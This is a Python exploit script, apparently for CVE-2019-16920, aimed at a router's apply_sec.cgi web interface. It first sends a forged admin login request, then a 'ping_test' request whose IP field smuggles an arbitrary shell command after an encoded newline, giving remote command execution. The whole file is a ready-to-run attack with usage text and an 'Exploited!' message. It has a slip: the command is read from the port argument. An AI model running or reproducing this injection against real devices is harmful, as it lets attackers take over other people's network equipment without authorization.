from socket import *
import sys
import time


def main():
	try:
		host = sys.argv[1]
		port = sys.argv[2]
		cmd = sys.argv[2]
		auth = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 142\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384"
		execution = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 131\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a" + cmd


		sock = socket(AF_INET, SOCK_STREAM)
		try:
			print("[*]Sending payload")
			sock.connect((host, int(port)))
		except:
			print("[!]Unable to connect to host")

		sock.sendall(auth.encode())
		sock.sendall(execution.encode())
		sock.close()
		print("[*]Exploited!")
	except:
		print("[*]Usage CVE-2019-16920.py ip port command")

if __name__ == '__main__':
	main()